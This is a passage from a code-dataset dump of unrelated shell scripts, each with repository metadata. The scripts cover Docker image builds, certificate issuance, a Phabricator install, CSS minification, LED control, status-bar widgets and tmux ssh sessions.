# host's .isolate-in-docker dir from the container; the home mount gives the
# tool an isolated per-project $HOME. X11 socket + DISPLAY enable GUI tools.
exec docker run \
  --rm \
  --interactive \
  --init \
  -a stdin -a stdout -a stderr \
  ${TTY_ARG} \
  --name "${DOCKER_NAME}" \
  --hostname "${DOCKER_HOSTNAME}" \
  --user "${DOCKER_USER}" \
  ${DOCKER_WORKDIR_ARGS} \
  --volume "$(pwd)/.isolate-in-docker/empty:$(pwd)/.isolate-in-docker:ro" \
  --volume "$(pwd)/.isolate-in-docker/home:${HOME}" \
  --env HOME="${HOME}" \
  --volume /tmp/.X11-unix:/tmp/.X11-unix \
  --env DISPLAY="${DISPLAY}" \
  ${PORT_ARGS} \
  $(maybeDockerception) \
  --net="${DOCKER_NET}" \
  ${DOCKER_EXTRA_ARGS} \
  ${DOCKER_IMAGE} \
  ${DOCKER_CMD} "${args[@]}"
| true |
55254e91e936771dbc11d28f7b76c4c09865121d | Shell | midiacom/alfa | /virtual-nodes/build_all.sh | UTF-8 | 2,813 | 2.890625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
cecho(){
RED="\033[0;31m"
GREEN="\033[0;32m"
YELLOW="\033[1;33m"
# ... ADD MORE COLORS
NC="\033[0m" # No Color
printf "${!1}${2} ${NC}\n"
}
# The Device Types
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Audio Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd device/audio_sample/
docker build . -t alfa/device/audio_sample
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Câmera USB"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/camera_usb/
docker build . -t alfa/device/camera_usb
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device RTSP to UDP"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/rtsp_to_udp/
docker build . -t alfa/device/rtsp_to_udp
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Video Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/video_sample/
docker build . -t alfa/device/video_sample
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Video Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/mic_device/
docker build . -t alfa/device/mic_device
# The VMS Types
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Plugin UDP to UDP"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_to_udp/
docker build . -t alfa/vms/udp_to_udp
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS UDP Video to Black And White and UDP Video"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_video_black_white/
docker build . -t alfa/vms/udp_video_black_white
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS UDP Video to Crop Video And UDP Video"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_video_crop
docker build . -t alfa/vms/udp_video_crop
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Noise Detector"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/noise_detector
docker build . -t alfa/vms/noise_detector
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Video Merge"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/video_merge
docker build . -t alfa/vms/video_merge
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Face Counter"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/face_counter
docker build . -t alfa/vms/face_counter
cecho "GREEN" "-----------------------------"
cecho "GREEN" "The installation was completed"
cecho "GREEN" "-----------------------------"
| true |
8172b45d85693f1f77691929cd40724e449400b0 | Shell | lttr/dotfiles | /not-used/i3/blocks/vpn | UTF-8 | 216 | 2.65625 | 3 | [] | no_license | #!/usr/bin/env bash
VPN1=$(nmcli c | awk '$3=="vpn" && $4!="--" {printf $1}')
[ -n "$VPN1" ] && echo -n "$VPN1 "
VPNC=$(ps aux | grep vpnc | grep -v grep | awk '{printf $NF}')
[ -n "$VPNC" ] && echo -n "$VPNC "
| true |
71039b6759f88a275b5b9ad90831d998b63d6ce8 | Shell | adagios/dotfiles | /bin/download-importer | UTF-8 | 337 | 3.125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
SERVER=$1
IMPORTER=${PWD##*/}
ORIGIN="$SERVER:/opt/recordm-importer/$IMPORTER/"
echo "Downloading from $ORIGIN"
for glob in '*.groovy' '*.js' '*.sql' '*.properties'; do
# queremos globbing
# shellcheck disable=SC2086
scp -o 'ControlPersist 10s' "${ORIGIN}"$glob . 2> >(grep -v 'No such file or directory')
done
| true |
a740ff2cdeb68723e4914e12052f89bb93b28b0d | Shell | olcf/anchor | /src/lib/lib_acme.sh | UTF-8 | 967 | 4.03125 | 4 | [
"MIT"
] | permissive | #!/bin/sh
#
# Run lego to get an HTTP certificate from an ACME server
#
# Reads in the following from the passed environment
# * $acme_server: ACME Server to poll for a certificate
# * $acme_email: Email address to use for ACME account
# Uses the file /ca.pem as the ACME server's issuing and TLS CA
#
# Outputs client certificate and private key to /client.cert and /client.key
# respectively
. /lib/lib_rngd.sh
acme_get_certificate() {
HOSTNAME="$(cat /proc/sys/kernel/hostname)"
rngd_start
info "Getting certificate for ${HOSTNAME} from ${acme_server}"
LEGO_CA_CERTIFICATES=/ca.pem lego --email "${acme_email}" \
--accept-tos \
--server "https://${acme_server}" --path /lego \
--http --domains "${HOSTNAME}" run
rngd_kill
# Move certs to / and remove /lego
info "Certificate issued. Installing"
mv "/lego/certificates/${HOSTNAME}.crt" /client.cert
mv "/lego/certificates/${HOSTNAME}.key" /client.key
rm -rf /lego
}
| true |
59b918047173ab77e2c35cdbe91bfcc52b5bd6db | Shell | orlandothoeny/magento2-vagrant-for-developers | /scripts/guest/configure_cache_backend | UTF-8 | 1,545 | 3.109375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
vagrant_dir="/vagrant"
source "${vagrant_dir}/scripts/output_functions.sh"
status "Configuring cache backend according to config.yaml"
incrementNestingLevel
cache_backend="$(bash "${vagrant_dir}/scripts/get_config_value.sh" "environment_cache_backend")"
magento_composer_content="$(cat "${MAGENTO_ROOT}/composer.json")"
redis_configuration="
'cache' => [
'frontend' => [
'default' => [
'backend' => 'Cm_Cache_Backend_Redis',
'backend_options' => [
'server' => '127.0.0.1',
'port' => '6379'
],
],
'page_cache' => [
'backend' => 'Cm_Cache_Backend_Redis',
'backend_options' => [
'server' => '127.0.0.1',
'port' => '6379',
'database' => '1',
'compress_data' => '0'
]
]
]
],
"
# Removing existing configuration
perl -i -p0e "s/,\s*'cache'.*\],/,/smg" "${MAGENTO_ROOT}/app/etc/env.php"
incompatible_magento_version_pattern='"version": "2.0.[0-5]'
if [[ ${cache_backend} == "redis" ]] && [[ ! ${magento_composer_content} =~ ${incompatible_magento_version_pattern} ]]; then
status "Using Redis backend for caching"
perl -i -p0e "s/\n*\);/${redis_configuration});/smg" "${MAGENTO_ROOT}/app/etc/env.php"
redis-cli flushall 2> >(logError) > >(log)
else
status "Using file system backend for caching"
fi
decrementNestingLevel
| true |
a68e11e2f59a735f2bc70d4da2181e3492b965dc | Shell | Gwinel/CHT-bench | /script/mkcsv.sh | UTF-8 | 1,005 | 2.890625 | 3 | [] | no_license | #!/bin/bash
# Benchmark sweep parameters: update ratios, thread counts, initial table sizes.
update_rate=(0 10 20 40 80)
threads=(1 4 8 12 16 20 24 28 32 36 40 44 48 52 56 60 64)
initial_size=(1000 10000 100000 1000000 10000000)
#threads=(1 2 4 8 12 16 24 32 48 64)
#algs=(LFList LFArray LFArrayOpt SO AdaptiveArray AdaptiveArrayOpt WFList WFArray Benchmark )
#algs=(lf-ht_rcu_np hop_no_htm )
algs=(hop_htm)
# For every (ratio, alg, threads, size) combination, summarise the raw runs
# into one CSV row: "<threads>, <mean of 5 runs>, <median of 5 runs>".
for ratio in ${update_rate[*]}
do
	for alg in ${algs[*]}
	do
		for thr in ${threads[*]}
		do
			for initial in ${initial_size[*]}
			do
				ofile=$alg."u$ratio"."i$initial".csv
				echo -n $thr >> ./csv/$ofile
				filename=./raw/output.$alg."n$thr"."u$ratio"."i$initial".csv
				# Sum the raw measurements with bc (values may exceed shell ints).
				total=0
				for i in `cat $filename`
				do
					total=$(echo $total + $i | bc)
				done
				# Average assumes exactly 5 measurements per raw file.
				avg=$(echo "$total / 5" | bc)
				echo -n , $avg , >> ./csv/$ofile
				# Median of 5: the 3rd value after a numeric sort.
				cat $filename | sort -n | head -n 3 | tail -n 1 >> ./csv/$ofile
			done
		done
	done
done
| true |
f5b9ca6e53359b0614784a84b35a83dcddb40e09 | Shell | aur-archive/dub | /PKGBUILD | UTF-8 | 658 | 2.5625 | 3 | [] | no_license | # Maintainer: Moritz Maxeiner <moritz@ucworks.org>
# Arch Linux PKGBUILD metadata for the D package manager "dub".
pkgname=dub
pkgver=0.9.18
pkgrel=1
pkgdesc="Package manager for D packages"
arch=('i686' 'x86_64')
url="https://github.com/rejectedsoftware/dub"
license=('MIT')
depends=('dmd' 'curl')
source=(${url}/archive/v${pkgver}.tar.gz)
conflicts=('dub-git')
md5sums=('d4e1d7656b828ca685ada96b350d1f87')
sha256sums=('0cbfb67a549beefd2b65a2779eff660b9057a9d51be017f9d46f48ad6e3214bf')
# Build via the project's own build script inside the unpacked source tree.
build()
{
	cd "${srcdir}/${pkgname}-${pkgver}"
	./build.sh
}
# Install the binary and the MIT license file into the package root.
package()
{
	cd "${srcdir}/${pkgname}-${pkgver}"
	install -D -m755 bin/dub "${pkgdir}/usr/bin/dub"
	install -D -m644 LICENSE.txt "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE.txt"
}
| true |
bdd325f648481124a65051380dd0d0e9bbc58e9e | Shell | dvalerio001/Course-Work | /gale-shapely/run-gs1.py | UTF-8 | 1,432 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Script name: run-gs1
# Purpose: Run program gs1 (Gale-Shapley) with different input sizes,
# Purpose: time the execution and record in file data.txt;
# Purpose: then fit a model for the execution time and
# Purpose: report fit stats and a plot of data vs model
# Input: No input required
# Output: A window with the gnuplot graph fitting the model given in file model.gpt,
# Output: also, the statistics of the fit are displayed on stdout,
# Output: also data.txt is created, used, and later removed.
# Requirements: gs1.c must be compiled and the object must reside in
# Requirements: the same directory as this script.
# Requirements: File model.gpt should be created previously with
# Requirements: the gnuplot code defining the model, requesting
# Requirements: the fit and the plot.
# Requirements: The model should also reside in the same directory.
# Requirements: gnuplot 4.6 should be installed previously.
# Requirements: If a file data.txt exists it must have been generated by this script.
# NOTE(review): despite the repo's "shell" label this is a Python script; it
# should be invoked with python3 (the original carried a /bin/bash shebang).
import os
import subprocess

# Run gs1.py for each input size and record its output in data.txt.
# Fixes over the original: the file is actually written and closed (the
# original opened it 'w' -- truncating any old data -- but never wrote to
# it), and each child process is waited for before gnuplot is launched
# (Popen was previously fired and forgotten).
with open('data.txt', 'w') as f:
    for i in range(1000, 2000, 500):
        result = subprocess.run(
            'python3 gs1.py {}'.format(i),
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
            shell=True, universal_newlines=True)
        f.write(result.stdout)

# Fit model, display results and plot graph once all data is collected.
os.system('gnuplot --persist model.gpt')
| true |
bf572005904bf3e8cb41da7ca862bc52d74596b2 | Shell | Azure/azure-quickstart-templates | /application-workloads/phabricator/phabricator-on-ubuntu/scripts/phabricator-install-ubuntu.sh | UTF-8 | 3,037 | 3.640625 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Install Phabricator and its dependencies (git, Apache, MySQL, PHP 7.0)
# under /opt on Ubuntu, configure an Apache vhost and initialise the DB.
cd /opt/
echo "PHABRICATOR UBUNTU INSTALL SCRIPT";
echo "This script will install Phabricator and all of its core dependencies.";
echo "Run it from the directory you want to install into.";
echo
ROOT=`pwd`
echo "Phabricator will be installed to: ${ROOT}.";
# Verify that passwordless/authenticated sudo works before doing anything.
echo "Testing sudo..."
sudo true
if [ $? -ne 0 ]
then
echo "ERROR: You must be able to sudo to run this script.";
exit 1;
fi;
echo "Installing dependencies: git, apache, mysql, php...";
echo
set +x
sudo apt-get -qq update
sudo apt-get -y install git apache2 dpkg-dev php7.0 php7.0-mysql php7.0-gd php7.0-dev php7.0-curl php7.0-cli php7.0-json libapache2-mod-php7.0 php7.0-mbstring
# Enable mod_rewrite
sudo a2enmod rewrite
# Clone (or update, if already present) the three Phacility repositories.
if [ ! -e libphutil ]
then
git clone https://github.com/phacility/libphutil.git
else
(cd libphutil && git pull --rebase)
fi
if [ ! -e arcanist ]
then
git clone https://github.com/phacility/arcanist.git
else
(cd arcanist && git pull --rebase)
fi
if [ ! -e phabricator ]
then
git clone https://github.com/phacility/phabricator.git
else
(cd phabricator && git pull --rebase)
fi
# Pre-seed the MySQL root password so the install is non-interactive.
sudo echo 'mysql-server mysql-server/root_password password pass@word1' | debconf-set-selections
sudo echo 'mysql-server mysql-server/root_password_again password pass@word1' | debconf-set-selections
sudo apt-get -y install mysql-server
# Write the Apache vhost.  $1 (first script argument) is the ServerName.
# NOTE(review): in `sudo echo ... >> file` the redirection is performed by
# the *calling* shell, not by sudo -- these appends only succeed when the
# whole script already runs with write access to /etc; confirm intended.
sudo touch /etc/apache2/sites-available/phabricator.conf
sudo echo "<VirtualHost *>" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "  ServerName $1" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "  DocumentRoot /opt/phabricator/webroot" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "  RewriteEngine on" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "  RewriteRule ^/rsrc/(.*)     -                       [L,QSA]" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "  RewriteRule ^/favicon.ico   -                       [L,QSA]" >> /etc/apache2/sites-available/phabricator.conf
sudo echo '  RewriteRule ^(.*)$          /index.php?__path__=$1  [B,L,QSA]' >> /etc/apache2/sites-available/phabricator.conf
sudo echo "</VirtualHost>" >> /etc/apache2/sites-available/phabricator.conf
sudo echo '<Directory "/opt/phabricator/webroot">' >> /etc/apache2/apache2.conf
sudo echo '  Require all granted' >> /etc/apache2/apache2.conf
sudo echo "</Directory>" >> /etc/apache2/apache2.conf
# Swap the default site for the Phabricator vhost and reload Apache.
sudo a2dissite 000-default.conf
sudo a2ensite phabricator.conf
sudo service apache2 reload
# Point Phabricator at MySQL and create/upgrade its schema.
sudo /opt/phabricator/bin/config set mysql.user root
sudo /opt/phabricator/bin/config set mysql.pass pass@word1
sudo /opt/phabricator/bin/storage upgrade --force
echo
echo "Install probably worked mostly correctly. Continue with the 'Configuration Guide':";
echo
echo "    https://secure.phabricator.com/book/phabricator/article/configuration_guide/";
echo
echo "You can delete any php5-* stuff that's left over in this directory if you want.";
| true |
43ce4ce1a73401458c03afe8ef3f9627613069fa | Shell | Bulinator/minify | /minifierobfusc.sh | UTF-8 | 1,025 | 3.78125 | 4 | [] | no_license | #!/bin/sh
# Minify all non-minified *.css files below the current directory with
# yui-compressor, writing <name>.min.css next to each and reporting the
# total bytes saved.  $1 = type (currently unused), $2 = ownership path.
#Author: Bulot Geoffrey
#Release: 2016-12-07
echo "******************************";
echo "*                            *";
echo "*  Compressing CSS/JS Files  *";
echo "*                            *";
echo "******************************";
type=$1;
path=$2;
# Both arguments are required.  FIX: the original printed the usage text
# but then kept running with an empty $path; abort instead.
if [ $# -lt 2 ]; then
	echo "\n\t Usage: <type> <path>";
	exit 1;
else
	echo "\nWork in progress...Please be patient for a while\n";
fi
saved=0
# NOTE(review): word-splitting find's output breaks on paths containing
# whitespace; kept as-is because the total in $saved must accumulate in
# this shell (a piped while-loop would run in a subshell and lose it).
for f in `find -name "*.css" -not -name "*.min.css"`;
do
	target=${f%.*}.min.css
	echo "\t- "$f to $target
	FILESIZE=$(stat -c%s "$f")
	# Quote the file arguments so names with special characters survive.
	yui-compressor --type css --nomunge -o "$target" "$f"
	FILESIZEC=$(stat -c%s "$target")
	diff=$(($FILESIZE - $FILESIZEC))
	saved=$(($saved + $diff))
	echo "\t $diff bytes saved"
done
echo "\n";
echo "*******************************";
echo "*   Total saved: $saved bytes   *";
echo "*******************************";
echo "*                             *";
echo "*        Bye Bye dude!!       *";
echo "*******************************";
# params ?
chown www-data.www-data $path/*.min.css
| true |
a0c9887d44cb18ba8e77ec20e5d094f1b3938344 | Shell | x-Bun-x/CFW-old | /cfw/core/src/opt/cfw/scripts/led-blink.sh | UTF-8 | 927 | 3.734375 | 4 | [] | no_license | #!/bin/sh
# Sysfs control node exposed by the PMIC LED driver.
LED_DEV=/sys/devices/platform/pmic_light.1/lit
# Driver channel numbers for the red, green and blue LEDs.
CH_R=3
CH_G=4
CH_B=5
#
# Current setting: 0 = off, 1 = on.
CUR_OFF=0
CUR_ON=1
# Duty-cycle setting: 0 = off, 1 = on.
DC_OFF=0
DC_ON=1
#BP=[0-3] : 0=1/256s 1=1/8s 2=1s 3=2s
BP_DEFAULT=0
# Program one LED channel via the sysfs node:
#   $1 = channel, $2 = current, $3 = blink period, $4 = duty cycle
led_ctrl() {
echo ch $1 > $LED_DEV
echo cur $2 > $LED_DEV
echo bp $3 > $LED_DEV
echo dc $4 > $LED_DEV
}
#$1 = ch
# Switch a single channel off (zero current, default period, zero duty).
led_off() {
led_ctrl $1 $CUR_OFF $BP_DEFAULT $DC_OFF
}
# Switch all three colour channels off.
led_off_all() {
led_off $CH_R
led_off $CH_G
led_off $CH_B
}
#$1 = color $2 = bp
# Light the channels selected by the colour bitmask in $1
# (bit 0 = red, bit 1 = green, bit 2 = blue) with blink period $2;
# channels whose bit is clear are switched off.
led_on() {
BP=$2
# POSIX arithmetic expansion replaces the three external `expr` calls
# (one fork/exec each) with builtin evaluation -- same results.
R_ON=$(( ($1 / 1) % 2 ))
G_ON=$(( ($1 / 2) % 2 ))
B_ON=$(( ($1 / 4) % 2 ))
if [ $R_ON -eq 1 ]; then
led_ctrl $CH_R $CUR_ON $BP $DC_ON
else
led_off $CH_R
fi
if [ $G_ON -eq 1 ]; then
led_ctrl $CH_G $CUR_ON $BP $DC_ON
else
led_off $CH_G
fi
if [ $B_ON -eq 1 ]; then
led_ctrl $CH_B $CUR_ON $BP $DC_ON
else
led_off $CH_B
fi
}
# CLI entry point: "OFF" extinguishes everything; otherwise $1 is the
# colour bitmask and the optional $2 overrides the default blink period.
if [ "$1" = "OFF" ]; then
led_off_all
else
BP=$BP_DEFAULT
if [ "$2" != "" ]; then
BP=$2
fi
led_on $1 $BP
fi
| true |
3984e40402982ee6a8c357c431291c180a13d9a4 | Shell | animeshsutradhar/sslctl | /ssl_cli/csr_request.sh | UTF-8 | 1,306 | 2.859375 | 3 | [] | no_license | #!/bin/bash
##############################################################
# Script : SSL
# Author : Animesh Sutradhar
# Date : 20/03/2017
# Last Edited: 02/04/2017, Animesh Sutradhar
# Description: To request SSL certificate
##############################################################
# Purpose:
#
#
#
# Requirements:
#
#
#
#
#
#
# Method:
#
#
# Syntax:
#
#
# Notes:
#
##############################################################
######################################
####	Opening Initializations	 #####
######################################
# FIX: abort if the SSL working directory is missing; the original kept
# running in the caller's cwd and scattered files there.
cd /etc/httpd/ssl || { echo "ERROR: /etc/httpd/ssl not found" >&2; exit 1; }
echo -e "Enter your virtual host FQDN: "
read -r cert
# Keep a dated backup of the CSR before (re-)signing it.
cp -p "$cert.csr" "/apps/scripts/ssl_cli/data/backup/$cert.csr_$(date +"%d-%m-%Y")"
# Self-sign the CSR with the host's private key, valid for one year.
openssl x509 -req -days 365 -in "$cert.csr" -signkey "$cert.key" -out "$cert.crt"
# Stage the certificate locally and log the transfer.
rsync -avz "$cert.crt" /apps/scripts/ssl_cli/data/ >> /apps/scripts/ssl_cli/rsynch.log
echo "" >> /apps/scripts/ssl_cli/rsynch.log
echo "" >> /apps/scripts/ssl_cli/rsynch.log
date >> /apps/scripts/ssl_cli/rsynch.log
# NOTE(review): "<HOST NAME>" is a template placeholder -- substitute the
# real destination directory before using this script in production.
rsync -avz /apps/scripts/ssl_cli/data/ root@192.168.204.130:/apps/scripts/ssl/data/<HOST NAME> >> /apps/scripts/ssl_cli/rsynch.log 2> /apps/scripts/ssl_cli/error.log
echo "==============================================================================================" >> /apps/scripts/ssl_cli/rsynch.log
echo "Done"
| true |
0ad53de2bec9b5cc910f56bb8a7e1c8a0d68dbca | Shell | SirNave/dm-settings | /waybar/scripts/waybar-drives.sh | UTF-8 | 1,763 | 3.8125 | 4 | [] | no_license | #!/bin/bash
# Build a Waybar custom-module JSON payload describing block devices:
# main_text summarises the root filesystem, tooltip_text lists every disk.
# Split lsblk output on newlines only so each device row stays one element.
oldifs="$IFS";
IFS=$'\n';
disks=($(lsblk -o KNAME,PTTYPE,FSTYPE,LABEL,FSAVAIL,FSUSE%,MOUNTPOINT -nf));
IFS="$oldifs";
main_text='';
tooltip_text='';
# Start at 1 to skip the first lsblk row (the whole-disk device).
for (( i=1; i<${#disks[@]}; i++ ));
do
# Re-split the row on whitespace; empty lsblk columns simply vanish, so
# the element count below tells us which columns were present.
disk_info=(${disks[i]});
if [ ${#disk_info[@]} == 2 ]
then
continue;
fi
# Symbolic column indices for the full 7-column case.
disk_info_name=0;
disk_info_pttype=1;
disk_info_fstype=2;
disk_info_label=3;
disk_info_avail=4;
disk_info_fuse=5;
disk_info_path=6;
# 3-4 fields: unmounted device, label columns only.
if [ ${#disk_info[@]} -ge 3 -a ${#disk_info[@]} -le 4 ]
then
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t${disk_info[disk_info_label]}\n";
# 6 fields: mounted but label column missing -- usage shifts down by one.
elif [ ${#disk_info[@]} == 6 ]
then
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t\t${disk_info[3]}\t${disk_info[4]}\t${disk_info[5]}\n";
# NOTE(review): with 6 fields the mountpoint is index 5, but index 6 is
# tested here (always empty), so main_text is never set on this branch --
# looks like an off-by-one; confirm against real lsblk output.
if [[ ${disk_info[6]} == "/" ]]
then
main_text=" ${disk_info[5]} ${disk_info[3]} ${disk_info[4]}";
fi
else
# All 7 columns present.
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t${disk_info[disk_info_label]}\t${disk_info[disk_info_avail]}\t${disk_info[disk_info_fuse]}\t${disk_info[disk_info_path]}\n";
# The root filesystem drives the bar's main text.
if [[ ${disk_info[disk_info_path]} == "/" ]]
then
main_text=" ${disk_info[disk_info_path]} ${disk_info[disk_info_avail]} ${disk_info[disk_info_fuse]}";
fi
fi
done
# for disk in $disks;
# do
# 	disk_info=$disk;
# 	echo "Loop Found "$disk;
# done
echo "{\"text\": \"$main_text\", \"alt\": \"alt\", \"tooltip\": \"$tooltip_text\", \"class\": \"class\", \"percentage\": \"percentage\" }"; | true |
a684a5ab65d41f0bea6f30713b374740dc28aa3d | Shell | jackslinde35/TANOS | /scripts/00-copyOriginalData.sh | UTF-8 | 514 | 2.78125 | 3 | [
"MIT"
] | permissive | #! /bin/bash
# Display this step's documentation, word-wrapped for the terminal, and exit.
# FIX(review): the original extracted the paragraph from itself with
# `tail -n +9 "$BASH_SOURCE" | head -n -1`, which silently prints the wrong
# lines whenever the header length changes; a quoted here-doc is immune.
fold -s <<'DOC'
This should be really be done manually. Simply copy the alignment file from wherever you presently have a copy to this project directory. The next step assumes it will be in the data/orig directory and named supermatrix_dna.phy. It is possible to change the name (manually). You could also modify the next step to run with amino acid alignments instead of nucleotide alignments.
DOC
exit 0
| true |
9e6ed88a6fa8f472d6ba9569ebabe4809d481848 | Shell | Internet-of-Zoo-Things/dallas-iozt-pi-scripts | /setup2.sh | UTF-8 | 816 | 2.78125 | 3 | [] | no_license | # setup download directory
echo "> Setting up download directory"
cd ~/Desktop
mkdir code
cd code
# setting up projects
echo "> Cloning projects"
git clone https://github.com/Internet-of-Zoo-Things/dallas-iozt-app.git
git clone https://github.com/Internet-of-Zoo-Things/dallas-iozt-connectivity-server.git
echo "> Setting up dallas-iozt-app"
cd dallas-iozt-app
npm install
cp .env.example .env
npm run build
echo "> Setting up dallas-iozt-connectivity-server"
cd ../dallas-iozt-connectivity-server
pip install -r requirements.txt
# additional setup
cd ~/Desktop
mkdir logs
# run on boot
echo >> /home/pi/.bashrc
echo >> /home/pi/.bashrc
echo "# iozt startup" >> /home/pi/.bashrc
echo "sh ~/dallas-iozt-pi-scripts/run.sh" >> /home/pi/.bashrc
echo "> Pi setup complete. Please reboot for changes to take effect." | true |
eca476182dd0bda26f122e29aabb2db3371550e9 | Shell | TechMaster/arrowjs-installer | /shell_scripts/website/validate.sh | UTF-8 | 530 | 3.8125 | 4 | [] | no_license | #!/bin/bash
# Validate a requested web-site location before installation.
# Arguments: $1 install path, $2 nginx flag (any non-empty value),
#            $3 nginx config file name.
# Exit codes: 127 parent directory missing, 128 target not empty,
#             129 nginx config already present.
location=$1
use_nginx=$2
file_name=$3

# Split the location into its parent directory and final component.
project_path=${location%/*}
project_name=${location##/*/}    # currently unused, retained from the original

# The parent directory must already exist.
[ -d "$project_path" ] || { echo "Directory is not exist!"; exit 127; }

# When the target itself exists, it has to be empty.
if [[ -d "$location" && "$(ls -A $location)" ]]; then
    echo "Directory is not empty!"
    exit 128
fi

# With nginx integration requested, refuse to clobber an existing config.
if [ -n "$use_nginx" ] && [ -f "/etc/nginx/conf.d/${file_name}" ]; then
    echo "File config already exist"
    exit 129
fi
echo "" | true |
0d85d70e14691a59e60aa184515bc628b6a597a3 | Shell | lukairui/GoSpark | /shells/start-all.sh | UTF-8 | 576 | 3.078125 | 3 | [] | no_license | #!/bin/bash
# ssh-multi
# to ssh to multiple servers
# Open one tmux pane per host, ssh into each, tile the layout, and mirror
# keystrokes to every pane (synchronize-panes).
starttmux() {
    #local hosts=(vision24 vision28 vision35)
    local hosts=(vision25 vision26 vision27 vision28 vision29 vision30 vision31 vision32 vision33 vision34 vision35 vision36 vision37 vision38)
    local UNAME=XXX # removed for security reason
    # First host gets a fresh window; the rest become horizontal splits.
    tmux new-window "ssh $UNAME@${hosts[0]}"
    # FIX: quote the subscript -- unquoted `hosts[0]` undergoes pathname
    # expansion and could match a file literally named "hosts0" (SC2184).
    unset 'hosts[0]'
    for i in "${hosts[@]}"; do
        tmux split-window -h "ssh $UNAME@$i"
        tmux select-layout tiled > /dev/null
    done
    tmux select-pane -t 0
    # Broadcast typed input to every pane at once.
    tmux set-window-option synchronize-panes on > /dev/null
}

# NOTE(review): HOSTS is populated from the environment/arguments but is
# never consumed -- the host list inside starttmux is hard-coded.
HOSTS=${HOSTS:=$*}
starttmux
| true |
b354cbb4e514ca1a86d1a29679f185b42e82a7c1 | Shell | Bioconductor/BBS | /utils/build-universal.sh | UTF-8 | 423 | 3.015625 | 3 | [] | no_license | #!/bin/bash
#
# Script for building a universal binary package from the source package (tarball).
# Typical use:
#
#   ./build-universal.sh affyio_1.5.8.tar.gz
#
# Note that this scripts does NOT check the source package!
#
# Author: Hervé Pagès <hpages.on.github@gmail.com>
# Last modified: 2007-08-11

# Resolve the helper scripts relative to this script's own directory.
# ($(...) replaces the legacy backticks; quoting keeps space-containing
# paths intact.)
INST_SCRIPT=$(dirname "$0")/macosx-inst-pkg.sh
MKTGZ_SCRIPT=$(dirname "$0")/macosx-make-tgz.sh

# Source the installer; it is expected to define $R_LIBS and $pkgname
# used below (see macosx-inst-pkg.sh).
. "$INST_SCRIPT"
"$MKTGZ_SCRIPT" "$R_LIBS/$pkgname"
| true |
e536d3ad96f1ac08dc691b461134149e36f6f83a | Shell | Technius/dotfiles | /setup-scripts/pkgs.sh | UTF-8 | 294 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Installs packages; forces root since sudo might not be installed.
source $(dirname $0)/util.sh

# FIX: actually refuse to continue as non-root -- the original printed the
# warning but carried on, so apt-get failed later with a worse error.
if ! is_root; then
  echo "You need to run this as root/sudo!"
  exit 1
fi

# Strip comments and blank lines from the package list file.
PKGS=$(cat $(dirname $0)/../debian-pkgs | sed -re 's/#.*//g' -e '/^\s*$/d')

apt-get update
# $PKGS is deliberately unquoted so each package name becomes its own
# argument to apt-get.
apt-get install $PKGS
| true |
fc8f284b49b9b573021e417a01e81456844d41fd | Shell | hajaalin/LMUISA_iRODS | /LMUISA_test/Data_File_edit.sh | UTF-8 | 409 | 3.171875 | 3 | [] | no_license | echo $0
export input=`basename $0`.txt
echo test > $input
# go to the iRODS collection created for the test run
icd $Data
# import input file in iRODS
iput $input
echo
echo Before...
cat $input
ils
##
## action to test
##
echo test2 >> $input
iput -f $input
if [ $? -eq 0 ]
then
echo "LMUISA_ERROR: $0: iput -f should not succeed."
fi
echo
echo ... After
ils
rm $input
iget $input
cat $input
echo
| true |
f041fb2860afcdd9e1b0a665e13cdb264d541f62 | Shell | richyen/toolbox | /pg/fdw/sqlite_fdw/entrypoint.sh | UTF-8 | 1,119 | 2.890625 | 3 | [] | no_license | #!/bin/bash
# Container entrypoint: install build tooling, compile and demo the
# sqlite_fdw PostgreSQL foreign-data wrapper, then idle to keep the
# container alive.
yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
yum -y install centos-release-scl-rh
